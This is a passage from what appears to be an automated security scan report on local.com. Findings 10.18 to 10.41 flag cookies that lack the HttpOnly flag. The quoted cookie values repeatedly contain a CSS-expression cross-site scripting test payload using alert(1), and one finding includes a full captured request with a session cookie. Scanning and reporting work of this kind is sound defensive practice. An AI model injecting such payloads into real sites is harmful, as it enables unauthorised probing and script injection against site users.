localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.18. http://www.local.com/details/photos/dallas-tx/cet-products-liquidators-9985416/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/details/photos/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:47:23 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.19. http://www.local.com/details/photos/dallas-tx/equity-bank-63975058/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/details/photos/dallas-tx/equity-bank-63975058/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:48:07 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.20. http://www.local.com/details/photos/dallas-tx/hillcrest-bank-104826937/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/details/photos/dallas-tx/hillcrest-bank-104826937/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:48:35 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.21. http://www.local.com/details/photos/dallas-tx/sterling-bank-16856575/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/details/photos/dallas-tx/sterling-bank-16856575/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:49:32 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.22. http://www.local.com/dialogs/account/acctreg.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dialogs/account/acctreg.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:54:19 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.23. http://www.local.com/dialogs/network.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dialogs/network.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:53:41 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.24. http://www.local.com/dialogs/register.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/dialogs/register.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:55:55 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.25. http://www.local.com/events/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:43:58 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.26. http://www.local.com/events/category/music/dallas-tx.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/category/music/dallas-tx.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:31 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.27. http://www.local.com/events/category/performing-arts/dallas-tx.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/category/performing-arts/dallas-tx.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:36 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.28. http://www.local.com/events/category/sports/dallas-tx.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/events/category/sports/dallas-tx.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:44:32 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&events.kw=none; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.29. http://www.local.com/faq.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/faq.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:53:12 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.30. http://www.local.com/privacy/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/privacy/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:52 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.31. http://www.local.com/results.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/results.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom=cid=506&loc=Dallas%2c+TX&kw=banks&uid=9e9962ee-715a-422c-a9da-c41c1b56ab77&expdate=634349085044720371&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX; domain=local.com; expires=Sat, 05-Mar-2011 15:55:04 GMT; path=/
localcom_s=cid=506&exp=634323183044720371; domain=local.com; expires=Thu, 03-Feb-2011 16:25:04 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.32. http://www.local.com/results/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/results/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:30 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults%2f~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.33. http://www.local.com/sitemap.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/sitemap.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:53:24 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.34. http://www.local.com/sitemap/chicago-il.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/sitemap/chicago-il.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:56 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Chicago%2c+Illinois&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.35. http://www.local.com/sitemap/los-angeles-ca.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/sitemap/los-angeles-ca.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:42 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Los+Angeles%2c+California&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.36. http://www.local.com/sitemap/new-york-ny.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/sitemap/new-york-ny.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:44 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=New+York%2c+New+York&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.37. http://www.local.com/terms/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/terms/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:51:38 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.38. http://www.local.com/topics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/topics/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:50:14 GMT; path=/
localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058&topics.kw=food; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.39. http://www.local.com/ver1.0/Direct/JavascriptSDKProxy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/ver1.0/Direct/JavascriptSDKProxy

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/
anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; domain=local.com; expires=Fri, 03-Feb-2012 16:00:49 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

10.40. http://www.local.com/ver1.0/Direct/Jsonp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/ver1.0/Direct/Jsonp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SiteLifeHost=SJL01WSITELCL01proddmlocal; domain=local.com; path=/
BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; path=/ ; domain=local.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /ver1.0/Direct/Jsonp?r=%7B%22Requests%22%3A%5B%7B%22UpdateArticleAction%22%3A%7B%22Categories%22%3A%5B%5D%2C%22OnPageTitle%22%3A%22Hillcrest%20Bank%20%2528Dallas%252C%20TX%2529%22%2C%22OnPageUrl%22%3A%22104826937%7CHillcrest%20Bank%7CDallas%252C%20TX%22%2C%22Section%22%3A%7B%22Section%22%3A%7B%22Name%22%3A%22Dallas%2C%20TX%22%7D%7D%2C%22UpdateArticle%22%3A%7B%22ArticleKey%22%3A%7B%22Key%22%3A%22104826937%22%7D%7D%7D%7D%5D%2C%22UniqueId%22%3A0%7D&cb=RequestBatch.callbacks.daapiCallback0&pcksl=http%3A%2F%2Fwww.local.com&pckdt=local.com HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/business/details/dallas-tx/hillcrest-bank-104826937/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: session_start_time=1296748820317; k_visit=1; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __qca=P0-30084348-1296748820628; s_cc=true; campid=506; s_nr=1296748831212; s_sq=%5B%5BB%5D%5D; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; SiteLifeHost=SJL01WSITELCL01proddmlocal; BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; __utmc=177062200; __utmb=177062200.8.10.1296748820; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; ym_pop_freq1421534=1

Response

10.41. http://www.local.com/ver1.0/Photo/Upload previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.local.com
Path:	/ver1.0/Photo/Upload

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

